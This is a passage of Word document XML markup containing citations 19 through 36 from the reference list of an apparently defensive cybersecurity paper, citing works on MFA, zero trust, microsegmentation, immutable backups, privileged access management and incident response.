        <w:br/>
        <w:t xml:space="preserve">        cyberattacks?”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C4CD7" w:rsidRPr="00C57BFC" w:rsidRDefault="00273E86" w:rsidP="004C4CD7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>[19</w:t>
      </w:r>
      <w:r w:rsidR="004C4CD7" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="004C4CD7" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve"> Microsoft Learn. “Security at your organization: MFA reduces account compromise by </w:t>
      </w:r>
      <w:r w:rsidR="00A12822" w:rsidRPr="00C57BFC">
        <w:br/>
        <w:t xml:space="preserve">        &gt;99.9%.”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D715B9" w:rsidRPr="00C57BFC" w:rsidRDefault="00AB33CB" w:rsidP="00D715B9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>[20</w:t>
      </w:r>
      <w:r w:rsidR="00D715B9" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00D715B9" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve"> National Institute of Standards and Technology (NIST). </w:t>
      </w:r>
      <w:r w:rsidR="00D715B9" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t xml:space="preserve">SP 800-207: Zero Trust </w:t>
      </w:r>
      <w:r w:rsidR="00D715B9" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        Architecture</w:t>
      </w:r>
      <w:r w:rsidR="00D715B9" w:rsidRPr="00C57BFC">
        <w:t>, Aug. 2020.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D715B9" w:rsidRPr="00C57BFC" w:rsidRDefault="005423C7" w:rsidP="00D715B9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>[21</w:t>
      </w:r>
      <w:r w:rsidR="00D715B9" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00D715B9" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve"> Bishop Fox / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D715B9" w:rsidRPr="00C57BFC">
        <w:t>Illumio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D715B9" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00D715B9" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t xml:space="preserve">Efficacy of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D715B9" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>Microsegmentation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D715B9" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>: Assessment Report</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E17A5" w:rsidRPr="00C57BFC" w:rsidRDefault="00385D29" w:rsidP="004E17A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>[22</w:t>
      </w:r>
      <w:r w:rsidR="004E17A5" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="004E17A5" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004E17A5" w:rsidRPr="00C57BFC">
        <w:t>Smiliotopoulos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004E17A5" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve">, N., et al. “Detecting Lateral Movement: A Systematic Survey,” </w:t>
      </w:r>
      <w:r w:rsidR="004E17A5" w:rsidRPr="00C57BFC">
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004E17A5" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>ResearchGate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004E17A5" w:rsidRPr="00C57BFC">
        <w:t>, 2023.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E17A5" w:rsidRPr="00C57BFC" w:rsidRDefault="00E12727" w:rsidP="004E17A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>[23</w:t>
      </w:r>
      <w:r w:rsidR="004E17A5" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="004E17A5" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004E17A5" w:rsidRPr="00C57BFC">
        <w:t>Canay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004E17A5" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve">, A. “Anomaly Detection in SIEM Data,” </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004E17A5" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>ResearchGate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004E17A5" w:rsidRPr="00C57BFC">
        <w:t>, 2025</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC6A21" w:rsidRPr="00C57BFC" w:rsidRDefault="00624264" w:rsidP="00BC6A21">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>[24</w:t>
      </w:r>
      <w:r w:rsidR="00BC6A21" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00BC6A21" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve"> Wahl, Chris. </w:t>
      </w:r>
      <w:r w:rsidR="00BC6A21" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t xml:space="preserve">“Recovering Fast from Ransomware Attacks: The Magic of an Immutable </w:t>
      </w:r>
      <w:r w:rsidR="00BC6A21" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        Backup Architecture.”</w:t>
      </w:r>
      <w:r w:rsidR="00BC6A21" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve"> White paper, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BC6A21" w:rsidRPr="00C57BFC">
        <w:t>Rubrik</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BC6A21" w:rsidRPr="00C57BFC">
        <w:t>, Sept 2023.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC6A21" w:rsidRPr="00C57BFC" w:rsidRDefault="00171E3D" w:rsidP="00BC6A21">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>[25</w:t>
      </w:r>
      <w:r w:rsidR="00BC6A21" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00BC6A21" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve"> Straub, Sebastian. </w:t>
      </w:r>
      <w:r w:rsidR="00BC6A21" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>“Immutable Backups: How It Works, Pros/Cons, and Best Practices.”</w:t>
      </w:r>
      <w:r w:rsidR="00BC6A21" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC6A21" w:rsidRPr="00C57BFC">
        <w:br/>
        <w:t xml:space="preserve">        N2W Blog, July 30 2024.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00670894" w:rsidRPr="00C57BFC" w:rsidRDefault="000D3DA7" w:rsidP="00670894">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>[26</w:t>
      </w:r>
      <w:r w:rsidR="00670894" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00670894" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00670894" w:rsidRPr="00C57BFC">
        <w:t>Ilori</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00670894" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve">, O., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00670894" w:rsidRPr="00C57BFC">
        <w:t>Nwosu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00670894" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve">, N., &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00670894" w:rsidRPr="00C57BFC">
        <w:t>Naiho</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00670894" w:rsidRPr="00C57BFC">
        <w:t>, H. N. “Third</w:t>
      </w:r>
      <w:r w:rsidR="00670894" w:rsidRPr="00C57BFC">
        <w:noBreakHyphen/>
        <w:t xml:space="preserve">Party Vendor Risks in IT Security: A </w:t>
      </w:r>
      <w:r w:rsidR="00670894" w:rsidRPr="00C57BFC">
        <w:br/>
        <w:t xml:space="preserve">        Comprehensive Audit Review and Mitigation Strategies.” </w:t>
      </w:r>
      <w:r w:rsidR="00670894" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t xml:space="preserve">World Journal of Advanced </w:t>
      </w:r>
      <w:r w:rsidR="002952B5" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidR="00670894" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>Research and Reviews</w:t>
      </w:r>
      <w:r w:rsidR="00670894" w:rsidRPr="00C57BFC">
        <w:t>, Vol 22(3), 2024, pp 213</w:t>
      </w:r>
      <w:r w:rsidR="00670894" w:rsidRPr="00C57BFC">
        <w:noBreakHyphen/>
        <w:t>224.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00670894" w:rsidRPr="00C57BFC" w:rsidRDefault="007253A3" w:rsidP="00670894">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>[27</w:t>
      </w:r>
      <w:r w:rsidR="00670894" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00670894" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve"> Hu, K., Levi, R., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00670894" w:rsidRPr="00C57BFC">
        <w:t>Yahalom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00670894" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve">, R., &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00670894" w:rsidRPr="00C57BFC">
        <w:t>Zerhouni</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00670894" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve">, E. “Supply Chain Characteristics as Predictors </w:t>
      </w:r>
      <w:r w:rsidR="00EA7185" w:rsidRPr="00C57BFC">
        <w:br/>
        <w:t xml:space="preserve">        of Cyber Risk: A Machine</w:t>
      </w:r>
      <w:r w:rsidR="00EA7185" w:rsidRPr="00C57BFC">
        <w:noBreakHyphen/>
        <w:t xml:space="preserve">Learning Assessment.” </w:t>
      </w:r>
      <w:r w:rsidR="00EA7185" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t xml:space="preserve">IEEE / Computer Society Digital </w:t>
      </w:r>
      <w:r w:rsidR="00EA7185" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidR="004C3C2A" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA7185" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>Library</w:t>
      </w:r>
      <w:r w:rsidR="00EA7185" w:rsidRPr="00C57BFC">
        <w:t>, 2025.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00206124" w:rsidRPr="00C57BFC" w:rsidRDefault="00AC29C8" w:rsidP="00206124">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>[28</w:t>
      </w:r>
      <w:r w:rsidR="00206124" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00206124" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve"> Oliver Wyman. </w:t>
      </w:r>
      <w:r w:rsidR="00206124" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>“The Imperative of Privileged Access Management.”</w:t>
      </w:r>
      <w:r w:rsidR="00206124" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve"> 2024. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00206124" w:rsidRPr="00C57BFC" w:rsidRDefault="00220E24" w:rsidP="00206124">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>[29</w:t>
      </w:r>
      <w:r w:rsidR="00206124" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00206124" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00206124" w:rsidRPr="00C57BFC">
        <w:t>BeyondTrust</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00206124" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00206124" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t xml:space="preserve">“Just-In-Time (JIT) Privileged Access Management (PAM): The Missing </w:t>
      </w:r>
      <w:r w:rsidR="00296F4F" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidR="00206124" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>Piece to Achieving True Least Privilege.”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00296F4F" w:rsidRPr="00C57BFC" w:rsidRDefault="0092165A" w:rsidP="00296F4F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>[30</w:t>
      </w:r>
      <w:r w:rsidR="00296F4F" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00296F4F" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00296F4F" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>Optimizing Cyber Incident Response: Avoid Delays and Unexpected Costs.</w:t>
      </w:r>
      <w:r w:rsidR="00296F4F" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve"> Security </w:t>
      </w:r>
      <w:r w:rsidR="00296F4F" w:rsidRPr="00C57BFC">
        <w:br/>
        <w:t xml:space="preserve">        Magazine, Jan 15 2025.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00296F4F" w:rsidRPr="00C57BFC" w:rsidRDefault="00151A6E" w:rsidP="00296F4F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[31</w:t>
      </w:r>
      <w:r w:rsidR="00296F4F" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00296F4F" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00296F4F" w:rsidRPr="00C57BFC">
        <w:t>Ojo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00296F4F" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve">, C., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00296F4F" w:rsidRPr="00C57BFC">
        <w:t>Osoko</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00296F4F" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve">, E. A., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00296F4F" w:rsidRPr="00C57BFC">
        <w:t>Okolo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00296F4F" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve">, J. N., &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00296F4F" w:rsidRPr="00C57BFC">
        <w:t>Jaji</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00296F4F" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve">, M. “Incident Response: A Structured Model </w:t>
      </w:r>
      <w:r w:rsidR="00296F4F" w:rsidRPr="00C57BFC">
        <w:br/>
        <w:t xml:space="preserve">        from Detection to Containment and Recovery.” </w:t>
      </w:r>
      <w:r w:rsidR="00296F4F" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t xml:space="preserve">World Journal of Advanced Research and </w:t>
      </w:r>
      <w:r w:rsidR="00296F4F" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        Reviews</w:t>
      </w:r>
      <w:r w:rsidR="00296F4F" w:rsidRPr="00C57BFC">
        <w:t>, 2024, 24(01), pp 1401</w:t>
      </w:r>
      <w:r w:rsidR="00296F4F" w:rsidRPr="00C57BFC">
        <w:noBreakHyphen/>
        <w:t>1407.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C25406" w:rsidRPr="00C57BFC" w:rsidRDefault="00C25406" w:rsidP="00C25406">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>[3</w:t>
      </w:r>
      <w:r w:rsidR="00A1702F" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve"> U.S. Payments Forum. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t xml:space="preserve">Strengthening the Security of Consumer Authentication through </w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        Phishing</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t>Resistant Multi</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t>Factor Authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:t>, 2024.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C25406" w:rsidRPr="00C57BFC" w:rsidRDefault="002F1877" w:rsidP="00C25406">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>[33</w:t>
      </w:r>
      <w:r w:rsidR="00C25406" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00C25406" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C25406" w:rsidRPr="00C57BFC">
        <w:t>Basta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C25406" w:rsidRPr="00C57BFC">
        <w:t>, N., et al. “Towards a Zero</w:t>
      </w:r>
      <w:r w:rsidR="00C25406" w:rsidRPr="00C57BFC">
        <w:noBreakHyphen/>
        <w:t>Trust Micro</w:t>
      </w:r>
      <w:r w:rsidR="00C25406" w:rsidRPr="00C57BFC">
        <w:noBreakHyphen/>
        <w:t xml:space="preserve">segmentation Network Security Strategy: An </w:t>
      </w:r>
      <w:r w:rsidR="00C25406" w:rsidRPr="00C57BFC">
        <w:br/>
        <w:t xml:space="preserve">        Evaluation Framework,” 2022.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00660E23" w:rsidRPr="00C57BFC" w:rsidRDefault="00860ADC" w:rsidP="00C25406">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:t>[34</w:t>
      </w:r>
      <w:r w:rsidR="00660E23" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve">] IBM Security and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00660E23" w:rsidRPr="00C57BFC">
        <w:t>Ponemon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00660E23" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve"> Institute, “</w:t>
      </w:r>
      <w:r w:rsidR="00660E23" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>Cost of a Data Breach Report 2023</w:t>
      </w:r>
      <w:r w:rsidR="00660E23" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve">,” IBM Corp., </w:t>
      </w:r>
      <w:r w:rsidR="00660E23" w:rsidRPr="00C57BFC">
        <w:br/>
        <w:t xml:space="preserve">        2023.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C25406" w:rsidRPr="00C57BFC" w:rsidRDefault="00876052" w:rsidP="00296F4F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:t>[35</w:t>
      </w:r>
      <w:r w:rsidR="00660E23" w:rsidRPr="00C57BFC">
        <w:t>] Gartner, “</w:t>
      </w:r>
      <w:r w:rsidR="00660E23" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>Best Practices for Ransomware Protection and Recovery</w:t>
      </w:r>
      <w:r w:rsidR="00660E23" w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve">,” Gartner Research,   </w:t>
      </w:r>
      <w:r w:rsidR="00660E23" w:rsidRPr="00C57BFC">
        <w:br/>
        <w:t xml:space="preserve">        2023</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE0216" w:rsidRPr="00C57BFC" w:rsidRDefault="00AE0216" w:rsidP="00AE0216">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:t>[3</w:t>
      </w:r>
      <w:r w:rsidR="00052C7C" w:rsidRPr="00C57BFC">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:t xml:space="preserve">] Nightfall AI blog. “The Economics of Data Loss Prevention,” 2021. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE0216" w:rsidRPr="00C57BFC" w:rsidRDefault="00052C7C" w:rsidP="00AE0216">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
